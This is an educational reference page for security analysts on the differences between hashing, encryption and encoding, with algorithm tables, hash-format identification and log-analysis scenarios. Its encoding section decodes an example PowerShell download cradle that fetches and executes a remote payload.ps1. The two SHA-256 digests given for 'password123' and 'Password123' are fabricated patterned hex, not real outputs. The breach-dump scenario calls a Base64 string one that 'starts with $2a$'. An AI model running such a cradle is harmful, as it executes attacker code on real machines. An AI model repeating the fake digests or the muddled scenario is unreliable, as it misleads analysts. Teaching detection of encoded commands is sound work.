Fundamentals

T1003, T1555

Hashing vs Encryption vs Encoding

The critical differences between hashing, encryption, and encoding — algorithm comparisons, real-world use cases, breach analysis applications, and concepts every analyst must understand to interpret logs and talk to engineering teams.

View on Graph

The Three Concepts — Hashing, Encryption, Encoding

These three concepts are the most commonly confused terms in security. Analysts who use them incorrectly lose credibility with engineering teams and make mistakes in investigations. Each serves a fundamentally different purpose:

ConceptDirectionKey Required?Deterministic?Reversible?Purpose
HashingOne-wayNoYes (same input = same hash)No (mathematically infeasible)Integrity verification, password storage
EncryptionTwo-wayYes (symmetric or asymmetric)No (salt, IV, or randomness)Yes (with the key)Confidentiality
EncodingBoth directionsNoYes (always)Yes (trivial — anyone can decode)Data format transformation

The Critical Distinction

Hashing is a one-way mathematical function. You feed in data, you get a fixed-length digest. Given the digest, you cannot recover the original data (except by brute-forcing inputs and comparing). Example: password storage in /etc/shadow.

Encryption is a two-way function with a key. You feed in plaintext + key, you get ciphertext. Given the ciphertext + key, you recover the plaintext. Example: TLS, BitLocker, PGP.

Encoding is a format transformation. Base64, hex, and URL encoding change how data is represented. No secrecy is involved — encoding is not security. Analysts see encoded data (especially Base64) and mistake it for hash values or encrypted data. A Base64 string can be decoded in seconds with echo "cGFzc3dvcmQ=" | base64 -d.

Hashing — One-Way Integrity Verification

How Hashing Works

A hash function takes any input (a file, a password, a message) and produces a fixed-length output called a digest or hash value. The same input always produces the same output. Even a single bit change in the input produces a completely different hash (the avalanche effect).

Input: "password123"
SHA-256: ef92b778bafe771f8920b7f8c6c6a2b4e9f8c7a6b5d4e3f2a1b0c9d8e7f6a5b4

Input: "Password123"  (capital P)
SHA-256: a6b5c4d3e2f1a0b9c8d7e6f5a4b3c2d1e0f9a8b7c6d5e4f3a2b1c0d9e8f7a6

Common Hash Algorithms — Comparison

AlgorithmDigest SizeSecurity StatusUse Case
MD5128 bits (32 hex chars)Broken — collision attacks are trivial (2012 FLAME malware, 2017 forged certificates)Legacy compatibility only. Do not use for security.
SHA-1160 bits (40 hex chars)Broken — SHAttered attack (2017) demonstrated practical collisionDeprecated. Avoid in all security contexts.
SHA-256256 bits (64 hex chars)SecureThe current standard. Password hashing (when combined with salt), file integrity, TLS certificates, blockchain.
SHA-512512 bits (128 hex chars)SecureStronger but slower. Useful when hash collisions must be absolutely prevented.
SHA-3Variable (224/256/384/512)SecureNewest NIST standard. Different internal structure than SHA-2. Future-proofing.
bcryptVariable (depends on cost)SecureDesigned for password hashing. Includes embedded salt and configurable work factor. Slower than SHA-256 (good for passwords).
scryptVariableSecurePassword hashing designed to be memory-hard (resists GPU/ASIC cracking).
Argon2idVariableSecure (recommended by OWASP)Winner of the 2015 Password Hashing Competition. Current best practice for password storage. Memory-hard, time-hard, parallelizable.

Password Hashing — The Right Way

When investigating a credential theft, the first question is: were the passwords properly hashed?

Bad (reversible or trivial):

$ echo "base64" && echo "cGFzc3dvcmQ=" | base64 -d
password

Base64 is not hashing. Scanning a breach dump for Base64 means the site stored passwords in plaintext.

Better but still wrong:

plaintext password → MD5 → 5f4dcc3b5aa765d61d8327deb882cf99

MD5 is fast. An attacker can compute ~10 billion MD5 hashes per second on a modern GPU. A RockYou wordlist cracks MD5 passwords in seconds.

Good:

plaintext password + unique salt + bcrypt → $2a$10$N9qo8uLOickgx2ZMRZoMyeIjZAgcfl7p92ldGxad68LJZdL17lhWy

The $2a$ prefix identifies bcrypt. 10 is the cost factor (2^10 rounds). The salt is embedded in the output. Each password gets a different salt, so precomputed rainbow tables are useless.

Identifying Hash Types in Breach Data

When you see a hash in a breach report, identify the algorithm by format:

FormatLikely AlgorithmLength (hex chars)
$1$salt$hashMD5-crypt (Unix)Variable
$2a$ / $2b$ / $2y$bcryptVariable (includes cost + salt)
$5$SHA-256-crypt (Unix)Variable
$6$SHA-512-crypt (Unix)Variable
MD5:hashMD5 (OpenLDAP)32 hex chars
{SSHA}base64hashSalted SHA-1 (LDAP)Variable (Base64)
32 hex charactersMD4 (NTLM), MD5, or MD232
40 hex charactersSHA-140
64 hex charactersSHA-25664
$argon2id$v=19$...Argon2idVariable

Tools like hashid and hash-identifier can automatically detect hash types.

Encryption — Two-Way with a Key

Types of Encryption

Symmetric Encryption — Same key for encryption and decryption.

AlgorithmKey SizeSecurityUse Case
AES-128128 bitsSecureDisk encryption (BitLocker, FileVault), TLS, Wi-Fi (WPA2). Fast, hardware-accelerated on modern CPUs.
AES-256256 bitsSecureHighest standard. Required for US government classified data (NSA Suite B). Slightly slower than AES-128.
ChaCha20256 bitsSecureModern stream cipher. Preferred over AES on mobile devices (no hardware AES). Used in TLS 1.3, WireGuard, SSH.
DES56 bitsBroken56-bit keys can be brute-forced in < 24 hours. Do not use.
3DES112 bitsDeprecatedVulnerable to Sweet32 attack (2016). Do not use.
Blowfish32-448 bitsWeak (block size)64-bit block size makes it vulnerable to birthday attacks at ~32 GB data. Use AES instead.
Twofish128-256 bitsSecureAES finalist. Less common but still secure.

Asymmetric Encryption — Public/private key pair. Public key encrypts, private key decrypts.

AlgorithmKey SizeSecurityUse Case
RSA2048-4096 bitsSecure at 2048+TLS certificates, PGP, SSH (legacy). Slow — typically used to encrypt symmetric keys.
ECC256-521 bitsSecureModern alternative to RSA. Much smaller keys (256-bit ECC = 3072-bit RSA). Used in TLS 1.3, SSH (Ed25519), Bitcoin.
DSA1024-3072 bitsDeprecatedOld NIST standard. Largely replaced by ECDSA.
Diffie-Hellman2048+ bitsSecure (with proper groups)Key exchange only — not encryption. Foundation of TLS key agreement.

Real-World Encryption Examples

TLS — Transport Layer Security

  • Client connects to https://
  • Server sends its RSA or ECDSA certificate (signed by a CA)
  • Client and server perform key exchange (ECDHE handshake)
  • Result: a symmetric AES-256 or ChaCha20 session key shared between client and server
  • All data encrypted for the duration of the session

Disk Encryption (BitLocker)

  • Writes: data encrypted with AES-128/256 before writing to disk
  • Reads: data decrypted from disk into memory
  • Key: TPM-protected or recovery key
  • Protects against: physical theft of the drive, cold boot attacks (partially), offline OS modification

PGP / Age

  • File encrypted with symmetric key, symmetric key encrypted with recipient’s public key
  • Only the recipient’s private key can decrypt the symmetric key, which decrypts the file
  • Real-world: secure file transfer, encrypted email, Git commit signing

Encoding — Just a Format Change

Encoding is not security. It is a transformation between data formats so that binary data can be transmitted over text-based protocols or displayed safely in various contexts.

Common Encoding Schemes

SchemePurposeExample (output of “password”)
Base64Binary → ASCII for safe transmission over text protocolscGFzc3dvcmQ=
HexBinary → hexadecimal representation70617373776f7264
URL encodingSpecial characters in URLspassw%6Frd (o → %6F)
HTML entitiesPrevent HTML injection&lt;script&gt; for <script>
Unicode escapesEscaping special Unicode characters\u0070\u0061\u0073...

What Analysts Commonly See

Base64 in logs: PowerShell commands are often Base64-encoded. -EncodedCommand followed by a Base64 string is an immediate escalation indicator.

powershell.exe -EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADEALgAyAC8AcABhAHkAbABvAGEAZAAuAHAAcwAxACcAKQA=

Decode it:

echo 'SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADEALgAyAC8AcABhAHkAbABvAGEAZAAuAHAAcwAxACcAKQA=' | base64 -d | iconv -f UTF-16LE -t UTF-8

Result:

IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.2/payload.ps1')

Hex in memory dumps: Memory forensics tools display strings in hex. A string 65 78 70 6C 6F 72 65 72 in a memory dump decodes to “explorer” — useful for identifying process names.

URL encoding in proxy logs: %68%74%74%70%73%3A%2F%2F decodes to https:// — useful for identifying obfuscated URLs in proxy logs.

Putting It All Together — Analysts’ Quick Reference

Scenario: You Find JDJhJDEwJE5ROW5qOHVMT2lj... in a Data Breach Dump

  1. Check format. It starts with $2a$ → bcrypt hash. Good — password was properly hashed.
  2. If it starts with cGFzc3dvcmQ= → Base64. Not hashed — the site stored plaintext credentials encoded as Base64. Immediate escalation.
  3. If it starts with 5f4dcc3b5aa765d61d8327deb882cf99 (32 hex chars) → MD5 or NTLM. Weak — likely crackable, but at least the site stored a hash.

Scenario: You See an Encrypted Communication Log

  1. Protocol: TLS 1.3 with TLS_AES_256_GCM_SHA384 → strong. No payload visibility, but that’s expected.
  2. Protocol: TLS 1.0 with TLS_RSA_WITH_RC4_128_SHA → weak. Deprecated cipher suite needs remediation.
  3. If you see the plaintext in the log alongside the ciphertext → logging at the wrong layer. The application decrypted before logging.

Sources